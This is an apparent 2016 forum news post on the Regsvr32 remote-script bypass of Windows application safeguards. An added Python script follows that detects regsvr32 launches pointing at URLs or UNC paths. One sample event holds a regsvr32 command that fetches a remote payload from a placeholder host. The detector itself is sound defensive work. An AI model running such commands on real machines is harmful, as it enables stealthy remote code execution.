Today's Hard|Forum Post

Monday April 25, 2016

Exploit Gets Around Windows' App Security Safeguards

It's crazy that no one caught this vulnerability until now. No need for administrator access, no protection of any sort, just point Regsvr32 to a remote file and presto, you can make a system run any app you want. eek!

Researcher Casey Smith has discovered a vulnerability in Windows that gets around this barrier. If you tell Regsvr32 to point to a remotely hosted file (such as a script), you can make a system run whichever app you want -- just what hackers and virus writers are looking for. It's stealthy, too, as it doesn't require administrator access or give itself away through registry changes.
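Because the technique described above needs no administrator access and leaves no registry changes, process-creation telemetry is the practical place to look for it. The following detection sketch is an added example, not part of the original post or the quoted article; the record fields (`host`, `user`, `image`, `cmd`) and the sample events are constructed for illustration, and command lines are assumed to be logged unescaped.

```python
import ntpath
import re

# A remote target is a URL or a UNC path (\\server\share\...).
REMOTE_ARG = re.compile(r'(?i)(?:\b(?:https?|ftp)://|\\\\[^\\\s"]+\\)')
# Split a Windows command line into tokens, keeping quoted strings together.
TOKEN = re.compile(r'"[^"]*"|\S+')

def regsvr32_remote_args(image, command_line):
    """Return the arguments of a regsvr32 launch that point at a remote location."""
    name = ntpath.basename(image.strip('"')).lower()
    if name not in ("regsvr32.exe", "regsvr32"):
        return []
    tokens = [t.strip('"') for t in TOKEN.findall(command_line)]
    # Skip the first token (the program itself) and inspect only its arguments.
    return [t for t in tokens[1:] if REMOTE_ARG.search(t)]

def find_suspicious(events):
    """Yield (host, user, remote_args) for every event worth an analyst's look.

    No filter on elevation is applied: the technique works for standard users.
    """
    hits = []
    for ev in events:
        remote = regsvr32_remote_args(ev["image"], ev["cmd"])
        if remote:
            hits.append((ev["host"], ev["user"], remote))
    return hits

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"'},
    {"host": "ws02", "user": "bob", "image": r"C:\Windows\SysWOW64\REGSVR32.EXE",
     "cmd": r"REGSVR32.EXE HTTP://files.example.invalid/payload.txt"},
    {"host": "ws03", "user": "carol", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 \\fileserver.example.invalid\share\component.dll"},
    {"host": "ws04", "user": "dave", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c start http://intranet.example.invalid/"},
]

if __name__ == "__main__":
    for host, user, remote in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT {host} {user}: regsvr32 referenced remote target(s) {remote}")
```

The same condition (image name is regsvr32 and an argument is a URL or UNC path) can be expressed as a rule in whatever endpoint or SIEM tooling already collects process command lines.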